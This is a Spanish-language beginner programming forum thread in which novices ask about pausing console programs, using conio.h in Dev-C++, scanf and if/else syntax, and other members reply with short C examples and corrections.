este es tu cogigo amigo CrAkEnçDeMoN yo hice una pequeña modificacion y coloqe el system pause y cambie otras cosas y funciona de igual manera aqui t dejo mi codigo:

#include <stdio.h>
#include <iostream.h>
int main()
{
   char nombre[20];
   int edad;

   printf( "Escriba su nombre: " );
   scanf( "%s", nombre );
   printf( "Escriba su edad: " );
   scanf( "%u", &edad );

   printf( "\nHola %s. Tienes %d años.\n", nombre, edad );

  system("PAUSE");
    return 0;
}
 
 ok tengo una pregunta con respecto al segundo codigo estoy trabajando don dev c++ 4.9.9.2 y compili y el codigo y fino se ejecuta el codigo perfectamente, pero despues que me me da la respuesta y me dice "hola el ______ tienes ____ años" me aparece un titulo q dice presiona una tecla para continuar... y si pulso cualqier tecla me finaliza el programa hasta dond tenia entedido el system("pause"); es para para la ajecucion del codigo y no lo permite seguir ejecutando mas nada y si qito el return 0; pasa lo mismo para mi no es un error pero mi preguntita es porq finaliza la ejecucion del programita expliquenme por fa, y como hago para q la ejucacion solo finalice cuando pulse una tecla en especifico, es decir, que programe aun boton, cuando el usuario pulso por ejm la tecla numero 1 finalice el programa como lo puedo hacer y muchas gracias...


Título: Re: Novato en C y Dev-c++
Publicado por: catp1710 en 29 Noviembre 2005, 01:21 am
ok acabo de revisar este codigo no soy muy bueno con c ni con c++ estoy comenzando asi q voy a ver q se puede hacer:

#include <stdio.h>

int main()
{
   char nombre[20];
   unsigned int edad=0;

   printf( "Escriba su nombre: " );
   scanf( "%s", nombre );
   printf( "Escriba su edad: " );
   scanf( "%u", &edad );

   fprintf( stdout, "\nHola %s. Tienes %d anyos.\n", nombre, edad );

   return 0;
}

este es tu cogigo amigo CrAkEnçDeMoN yo hice una pequeña modificacion y coloqe el system pause y cambie otras cosas y funciona de igual manera aqui t dejo mi codigo:

#include <stdio.h>
#include <iostream.h>
int main()
{
   char nombre[20];
   int edad;

   printf( "Escriba su nombre: " );
   scanf( "%s", nombre );
   printf( "Escriba su edad: " );
   scanf( "%u", &edad );

   printf( "\nHola %s. Tienes %d años.\n", nombre, edad );

  system("PAUSE");
    return 0;
}
 
 ok tengo una pregunta con respecto al segundo codigo estoy trabajando don dev c++ 4.9.9.2 y compili y el codigo y fino se ejecuta el codigo perfectamente, pero despues que me me da la respuesta y me dice "hola el ______ tienes ____ años" me aparece un titulo q dice presiona una tecla para continuar... y si pulso cualqier tecla me finaliza el programa hasta dond tenia entedido el system("pause"); es para para la ajecucion del codigo y no lo permite seguir ejecutando mas nada y si qito el return 0; pasa lo mismo para mi no es un error pero mi preguntita es porq finaliza la ejecucion del programita expliquenme por fa, y como hago para q la ejucacion solo finalice cuando pulse una tecla en especifico, es decir, que programe aun boton, cuando el usuario pulso por ejm la tecla numero 1 finalice el programa como lo puedo hacer y muchas gracias...


Título: Re: Novato en C y Dev-c++
Publicado por: catp1710 en 29 Noviembre 2005, 01:30 am
ok acabo de revisar este codigo no soy muy bueno con c ni con c++ estoy comenzando asi q voy a ver q se puede hacer:

#include <stdio.h>

int main()
{
   char nombre[20];
   unsigned int edad=0;

   printf( "Escriba su nombre: " );
   scanf( "%s", nombre );
   printf( "Escriba su edad: " );
   scanf( "%u", &edad );

   fprintf( stdout, "\nHola %s. Tienes %d anyos.\n", nombre, edad );

   return 0;
}

este es tu cogigo amigo CrAkEnçDeMoN yo hice una pequeña modificacion y coloqe el system pause y cambie otras cosas y funciona de igual manera aqui t dejo mi codigo:

#include <stdio.h>
#include <iostream.h>
int main()
{
   char nombre[20];
   int edad;

   printf( "Escriba su nombre: " );
   scanf( "%s", nombre );
   printf( "Escriba su edad: " );
   scanf( "%u", &edad );

   printf( "\nHola %s. Tienes %d años.\n", nombre, edad );

  system("PAUSE");
    return 0;
}
 
 ok tengo una pregunta con respecto al segundo codigo estoy trabajando don dev c++ 4.9.9.2 y compili y el codigo y fino se ejecuta el codigo perfectamente, pero despues que me me da la respuesta y me dice "hola el ______ tienes ____ años" me aparece un titulo q dice presiona una tecla para continuar... y si pulso cualqier tecla me finaliza el programa hasta dond tenia entedido el system("pause"); es para para la ajecucion del codigo y no lo permite seguir ejecutando mas nada y si qito el return 0; pasa lo mismo para mi no es un error pero mi preguntita es porq finaliza la ejecucion del programita expliquenme por fa, y como hago para q la ejucacion solo finalice cuando pulse una tecla en especifico, es decir, que programe aun boton, cuando el usuario pulso por ejm la tecla numero 1 finalice el programa como lo puedo hacer y muchas gracias...


Título: Re: Novato en C y Dev-c++
Publicado por: fell FX en 23 Diciembre 2005, 06:48 am
parece que ya es demasiado tarde para contestar pero a un asi lo hare;

el System("Pause");
es una llamada al systema operativo.
por tanto no hace otra cosa que mandar el mensaje de finalizacion
y ademas no es muy recomendable usarlo..

para tu proposito usa una funcion de stdio.h

asi no tendras que agregar  iostream

usa getchar();


puedes hace un blucle while poniendo como condicion de salida que el usuario pulse determinada tecla como la s o la q.

seria :

do
{

//Pedir nombre
//Pedir edad
//Mostrar salodo nombre y edad
//preguntar si decea salir.

printf("Deceas salir del programa  S/N");

result = getchar();
while('s' == result || 'S' == result);

esto te mantendra en el programa asta que el usuario precione la S o s.

NOTA: la variable resul es una de tipo char y devera de estar declarada previamente.

Espero te sea de utilidad.


Título: Re: Novato en C y Dev-c++
Publicado por: sowher en 4 Enero 2006, 06:33 am
Bueno catp1710 te sale esas rayas por que te falto compltar un & a la hora q se cargaba la variable...

Código:
printf( "Escriba su nombre: " );
scanf( "%s",[b]&[/b] nombre );
printf( "Escriba su edad: " );
scanf( "%u", &edad );

solo era eso...

Suerte


Título: Re: Novato en C y Dev-c++
Publicado por: Kanny en 14 Febrero 2006, 01:35 am
Bueno catp1710 te sale esas rayas por que te falto compltar un & a la hora q se cargaba la variable...

Código:
printf( "Escriba su nombre: " );
scanf( "%s",[b]&[/b] nombre );
printf( "Escriba su edad: " );
scanf( "%u", &edad );

Wenas sowher !!

Mas o menos me manejo en el tema.. pero no habia visto nunca esa y en
Código:
scanf( "%s",[b]&[/b] nombre );
:shocked: :huh: :-

Me podrias decir que hacen?? o cuando se usan?? Yo nunca las he puesto y siempre me ha funcionado bien :- :huh:

Gracias.Un saludo
solo era eso...

Suerte


Título: Re: Novato en C y Dev-c++
Publicado por: sowher en 21 Febrero 2006, 04:01 am
Bueno catp1710 te sale esas rayas por que te falto compltar un & a la hora q se cargaba la variable...

Código:
printf( "Escriba su nombre: " );
scanf( "%s",[b]&[/b] nombre );
printf( "Escriba su edad: " );
scanf( "%u", &edad );

Wenas sowher !!

Mas o menos me manejo en el tema.. pero no habia visto nunca esa y en
Código:
scanf( "%s",[b]&[/b] nombre );
:shocked: :huh: :-

Me podrias decir que hacen?? o cuando se usan?? Yo nunca las he puesto y siempre me ha funcionado bien :- :huh:

Gracias.Un saludo
solo era eso...

Suerte

Sencillamente lo queria olocar negrito :D pero veo q cuando hacer code no e puede :P


Título: Re: Novato en C y Dev-c++
Publicado por: Kanny en 21 Febrero 2006, 13:46 pm
kjjejejje

OK sowher !! ya me parecia extraño...

un saludo ;)


Título: Re: Novato en C y Dev-c++
Publicado por: Joanito en 9 Marzo 2006, 00:02 am
me gustaria saber que puedo colocar despues de un scanf(); para reemplazar un getchar();...


Título: Re: Novato en C y Dev-c++
Publicado por: Emir_yui en 25 Marzo 2006, 18:11 pm
Hola, a mi me gusta mucho la programación y se manejar un poco C++ y tengo una duda, bueno algunas dudas y no se me podrian ayudar, es que necesito como añadir mas datos a un fichero, no se bien q se utiliza y a parte no se si me podrian decir para que se utiliza: fprint y fscanf, es que he encontrado algunos ejemplos pero no se bien, si me pueden ayudar por favor.


Título: Re: Novato en C y Dev-c++
Publicado por: Cy.neOh en 12 Agosto 2006, 06:50 am
disculpen mi ignorancia pera para q sirven los codigos? xDDDD

lo q pasa es q soy muyyy novato en programadores ahh y otra cosa.. como se usan?

muchas gracias y 1000 disculpas nuevamente


Título: Re: Novato en C y Dev-c++
Publicado por: xDie en 1 Septiembre 2006, 00:06 am
Yo uso el dev c tmb y me da terribles problemas, al otra vez n podia ni imprimir algo wn la panatalla necesito un buen manual.. si alguien sabe gracias!  :rolleyes:


Título: Re: Novato en C y Dev-c++
Publicado por: wise en 28 Septiembre 2006, 17:20 pm
umh yo uso la libreria iostream.h y conio.h y para imprimir en pantalla el cout<<"" y el cin>> para introducir datos no se si solo se podran usar en c++ y no son propios de c....


Título: Re: Novato en C y Dev-c++
Publicado por: JuszR en 28 Septiembre 2006, 18:55 pm
umh yo uso la libreria iostream.h y conio.h y para imprimir en pantalla el cout<<"" y el cin>> para introducir datos no se si solo se podran usar en c++ y no son propios de c....
conio es de Borland, así que no te servirá en Dev-C++ porque usas MinGw (GCC).

cin y cout son de C++, en C serían printf() y scanf(). :rolleyes:


Título: Re: Novato en C y Dev-c++
Publicado por: wise en 28 Septiembre 2006, 21:48 pm
pues en Dev C++ me funciona esa libreria y otra k se llama conio.c pero la verda k no se en k se diferencian ni na :P gracias por aclarar lo de cout y cin esk soi novato y no se nada de c solo algo de c++ ;)


Título: problemas con algunas instrucciones
Publicado por: dvd1975 en 14 Octubre 2006, 18:01 pm
hola yo siempre compilado los programas y ejecutado en borland c++ pero ahora mi profe quiere que utilicemos dev c++ y claro ahora me encuentro que todos los programas que tengo hechos no me funcionan .
por ejemplo este programa
#include <stdio.h>
#include <conio.h>
#include <stdlib.h>

void main(void)
{
int num1,num2,num3, num4;

system("color 27");
textbackground(2);
cprintf("Introduzca primer numero: ");
cscanf("%i", &num1);
cprintf("\nIntroduzca segundo numero: ");
cscanf("%i", &num2);
cprintf("\nIntroduzca tercer numero: ");
cscanf("%i", &num3);
cprintf("\nIntroduzca cuarto numero: ");
cscanf("%i", &num4);

gotoxy(30,5);
cprintf("RESULTADO");
gotoxy(30,6);
cprintf("*********");

if  (num1%2==0)
{
    gotoxy(1,7);
    cprintf("El numero es par %i", num1);

    }

else{
    gotoxy(40,7);
    cprintf("El numero es impar %i", num1);

    }

if  (num2%2==0)
{
    gotoxy(1,8);
    cprintf("El numero es par %i", num2);

    }

else
    {
    gotoxy(40,8);
    cprintf("El numero es impar %i", num2);

        }
if  (num3%2==0)
{
    gotoxy(1,9);
    cprintf("El numero es par %i", num3);

    }

else{
    gotoxy(40,9);
    cprintf("El numero es impar %i", num3);

    }
if  (num4%2==0)
{
    gotoxy(1,10);
    cprintf("El numero es par %i", num4);

    }

else{
    gotoxy(40,10);
    cprintf("El numero es impar %i", num4);
   
    }

getch();
getch();
}
que me funcionaba perfectamente en borland en dev c++ no me funciona.
He leido los comentarios que se ha dejado, pero no se si sere un poco tonta porque no  se como añadir la libreria conio.h o c o lo que sea para que sin tener que corregir mi programa pueda utilizarlo.
¿Es posible compilar y ejecutar mi programa en dev c++ aunque este escribo en borland? Me gustaria poder saber com compilarlo sin tener que cambiar ninguna instruccion.
ademas de error en cprintf, cscanf me aparece un error tambien en la funcion que creado para el menu, no si se en dev c++ se escribe de otra manera.
Tambien tengo la duda de como se puede ver en dev  c++ las variables y el valor que van tomando, en borland tu das a f8 y te va ejecutando el programa sale un cuadrito con las variables y con elvalor que van tomando.
aqui en dev c++ hay una opcion en menu de arriba depurar-->añadir watch y  esta la opcion ver variable pero cuando lo selecciono no me aparece nada ninguna ventanita.
Alguien me podria ayudar gracias.


Título: Re: Novato en C y Dev-c++
Publicado por: Dark-Death en 28 Marzo 2007, 18:31 pm
Hi la verdad soy alumno de 1ª año (Mechon) y necesito ayuda para aprender a program en c++

   si me pueden enseñar a prog se los agradeceria
  por eje cual es la estrucctura de un algoritmo
  y para q sirve cada simbologia
     como x eje (&= segun tengo entendido es y )


Título: Re: Novato en C y Dev-c++
Publicado por: D3rick en 31 Marzo 2007, 08:28 am
dvd1975::: me parece muy tarde mi respuesta, pero ahi te va el code trabajado en Dev C++. agregue un clrscr() para ver el resultado :)

Código:
#include <stdio.h>
#include <conio2.h>
#include <stdlib.h>

int main()
{
int num1,num2,num3, num4;

system("color 27");
textbackground(2);
printf("Introduzca primer numero: ");
scanf("%i", &num1);
printf("\nIntroduzca segundo numero: ");
scanf("%i", &num2);
printf("\nIntroduzca tercer numero: ");
scanf("%i", &num3);
printf("\nIntroduzca cuarto numero: ");
scanf("%i", &num4);

clrscr();
gotoxy(30,5);
printf("RESULTADO");
gotoxy(30,6);
printf("*********");

if  (num1%2==0)
{
    gotoxy(1,7);
    printf("El numero es par %i", num1);

    }

else{
    gotoxy(40,7);
    printf("El numero es impar %i", num1);

    }

if  (num2%2==0)
{
    gotoxy(1,8);
    printf("El numero es par %i", num2);

    }

else
    {
    gotoxy(40,8);
    printf("El numero es impar %i", num2);

        }
if  (num3%2==0)
{
    gotoxy(1,9);
    printf("El numero es par %i", num3);

    }

else{
    gotoxy(40,9);
    printf("El numero es impar %i", num3);
    }
if  (num4%2==0)
{
    gotoxy(1,10);
    printf("El numero es par %i", num4);
    }

else{
    gotoxy(40,10);
    printf("El numero es impar %i", num4);
    }

getch();
}

Y bueno creo que la mayoria habla sobre el problema de usar conio en Dev-C++, pero navegando en la web llegue a encontrar una solucion, donde explica como instalarlo y configurarlo:
Instalar conio en Dev-C++ (http://www.programacionenc.net/modules.php?name=Tutoriales&d_op=vertuto&lid=28)

Y Dark-Death:::

Si quieres aprender a programar en C++, comienza por C.
Ahora sobre la estructura de algoritmo, no te sabria responder pero una idea es que siempre hay un inicio un fin, asignaciones, declaraciones, y las impresiones. mmm no se entiende mucho.

Y cada simbologia respresenta un operador, y se usa de diferente manera, un & es diferente a usar &&.

Bien como te digo empieza con C, y si vas con algoritmos mucho mejor. Por ahora yo hago lo mismo.  =)


Título: Re: Novato en C y Dev-c++
Publicado por: Dracula mora 04 en 2 Junio 2007, 01:03 am
Hola a todos..



Título: Re: Novato en C y Dev-c++
Publicado por: alvk4r en 11 Junio 2007, 13:27 pm
Bueno, tios, la libreria conio solo esta disponible para las versiones propietarias, aunque el Devcpp trae una, yo no la uso...
Cuando creas un nuevo proyecto, al igual que muchos IDES, el Devcpp, pone algo de codigo preelaborado...
Bueno, en vez de getch(), para que no se cierre la aplicacion, yo uso:

system("PAUSE");

Y para limpiar la pantalla:

system("CLS");

Otra cosa, porque en ves de usar printf y/o scanf, no utilizas los streams???

cout << "Hola Mundo!!! ";

o

cin >> [variable];

Actualmente no uso el devcpp, utilizo el entorno mingw junto a un "Minimal System", es decir instalo el GCC, el binutils de Linux portado a windows,  el programa make y el MSys.

No obstante, el dev-cpp utiliza los programas del mingw.


Título: Re: Novato en C y Dev-c++
Publicado por: alextremes en 30 Junio 2007, 14:20 pm
Hola todos, me he iniciado en el mundo de las redes neuronales, y descarge una libreria devpack llamada fann, la pueden descargar aqui http://samotyjak.pwsz.elblag.pl/devpak/fann-2.0.0-gcc3.4.4-3siomek.DevPak (http://samotyjak.pwsz.elblag.pl/devpak/fann-2.0.0-gcc3.4.4-3siomek.DevPak).

tengo la ultima version del Dev-C++,  instalo la libreria, pero cuando intento ejecutar los ejemplo que trae con sigo el pack me aparecen errores del tipo "unabiable reference" cada vez que el programa intenta usar una funcion de dicha libreria.

Si alguien sabe a que se debe esto, le estare muy agradecido que me puedan dar una mano, si es posible descargen la libreria e instalenla y vean lo que digo que pasa.

att: alextremes@gmail.com.


Título: Re: Novato en C y Dev-c++
Publicado por: AngelF en 28 Febrero 2008, 21:28 pm
NO SE SI TE SIRVA PERO YA QUE YO SOY NUEVO EN ESTO IGUAL Y ME PASABA LO MISMO.

PARA QUE EL PROGRAMA SE QUEDE PAUSADO DESPUES DE SER COMPILADO TIENES QUE AGREGAR AL FINAL ANTES DE CERRAR LA LLAVE } LO SIGUIENTE:

getch ();


CON ESTO SE QUEDARA PAUSADO HASTA QUE PRESIONES UNA TECLA O TERMINES CON TODO LO QUE TENIA QUE HACER TU PROGRAMA.

EJEMPLO:

# include "stdio.h"
# include "conio.h"

int main ()

{
    int n1,n2,r;

      printf ("ingresar el primer numero: ");
      scanf ("%i",&n1);

      printf ("ingresar el segundo numero: ");
      scanf ("%i",&n2);

      r = n1+n2;

      printf ("el resultado de la suma es: %i",r);

getch ();
}





Título: Re: Novato en C y Dev-c++
Publicado por: invisible_hack en 29 Febrero 2008, 18:53 pm
Una sugerencia, sobre todo para los que se esten iniciando en C++, y no les guste trabajar con tanto código puro y duro, pues instalense el WxDevC++, que es como un añadido para el DevC++ que permite crear de manera mucho más sencilla y de modo visual interfaces gráficas etc...

Saludos...


Título: Re: Novato en C y Dev-c++
Publicado por: Meylar en 30 Mayo 2011, 06:53 am
Holas..! Reviviendo muertos, pero tambien soy nueva en esta area y me gustaria que me brindaran su ayuda, mi problema es que no me copila el siguiente programa (me da error en los else):

#include <stdio.h>
#include <conio.h>

main()
{
      float num, pre, des, tot;
     
     
      puts("Digite el número de computadoras:");
      scanf("%f",&num);
      puts("Ingrese el precio por unidad");
      scanf("%f", &pre);
      if((num>=0)&&(pre>0))
        {
               tot=num*pre;
                       if(num<100)
                          des=pre*0.1;
                          printf("El total a pagar es: %f \n\n Su descuento es %f",tot,des);
                       
                       else
                           {   
                             if((num<200) && (num>=100))
                                   des=pre*0.2;
                                   printf("El total a pagar es: %f \n\n Su descuento es: %f",tot,des);
                             else
                                    des=pre*0.4;
                                    printf("El total a pagar es: %f \n\n Su descuento es: %f",tot,des);
                            }
         }
               
       
      else
              printf("ERROR EN DATOS DE ENTRADA");
             
getch();
return 0;
}


Título: Re: Novato en C y Dev-c++
Publicado por: <<<-Basura->>> en 30 Mayo 2011, 07:32 am
tu problema es que estas haciendo esto

Código
  1. if{
  2. /*codigo*/
  3. else{  //<< aqui esta tu error tienes que cerrar y abrir otra vez
  4. /*codigo*/
  5. }
  6.  

Digamos corregido es así

Código
  1. if{
  2. /*codigo*/
  3. }else{
  4. /*codigo*/
  5. }


Título: Re: Novato en C y Dev-c++
Publicado por: Meylar en 30 Mayo 2011, 07:50 am
Tienes toda la razon  :rolleyes:... muchas gracias por tu ayuda ;).

Y solo para que veas que lo corregi:
#include <stdio.h>
#include <conio.h>

main()
{
      float num, pre, des, tot;
     
     
      puts("Digite el número de computadoras:");
      scanf("%f",&num);
      puts("Ingrese el precio por unidad");
      scanf("%f", &pre);
      if((num>=0)&&(pre>0))
        {
               tot=num*pre;
                       if(num<100)
                         {
                          des=pre*0.1;
                          printf("El total a pagar es: %f \n\n Su descuento es %f",tot,des);
                         }
                       else
                           {   
                             if((num<200) && (num>=100))
                                   {
                                   des=pre*0.2;
                                   printf("El total a pagar es: %f \n\n Su descuento es: %f",tot,des);
                                   }
                             else
                                    des=pre*0.4;
                                    printf("El total a pagar es: %f \n\n Su descuento es: %f",tot,des);
                            }
         }
               
       
      else
              printf("ERROR EN DATOS DE ENTRADA");
             
getch();
return 0;
}


Título: Re: Novato en C y Dev-c++
Publicado por: <<<-Basura->>> en 30 Mayo 2011, 07:59 am
Acaba de ver otro error, si no te compila es porque cuando declaraste el main lo hiciste mal,

Código
  1. main(){
  2. /*Código*/
  3. return 0;
  4. }
  5.  

Si lo haces así esta mal porque estas retornando una valor y al main no le das el tipo:
seria así:
Código
  1. int main() // int porque retorna valor entero
  2.  

Por si tienes errores al compilar.


Título: Re: Novato en C y Dev-c++
Publicado por: Meylar en 30 Mayo 2011, 08:08 am
Super extraño, no me dio ningun problema... Por otra parte literalmente soy nueva en esto (son mis comienzos  ;D) y por el momento no entiendo a que te refieres con lo de:
int main() // int porque retorna valor entero
Lo que significa que tengo que  leer más  :xD

Una vez más gracias


Título: Re: Novato en C y Dev-c++
Publicado por: Slava_TZD en 30 Mayo 2011, 08:13 am
Super extraño, no me dio ningun problema... Por otra parte literalmente soy nueva en esto (son mis comienzos  ;D) y por el momento no entiendo a que te refieres con lo de:
int main() // int porque retorna valor entero
Lo que significa que tengo que  leer más  :xD

Una vez más gracias

Que main es una función, y como todas las funciones si es del tipo int, retorna un entero, en tu caso si retorna 0, significa que ha terminado correctamente. De todas maneras casi todos los compiladores toman un main sin tipo como int.


Título: dev c++
Publicado por: mfdas en 12 Diciembre 2011, 05:39 am
alguien me ayudaria a aprender a programar en dev c++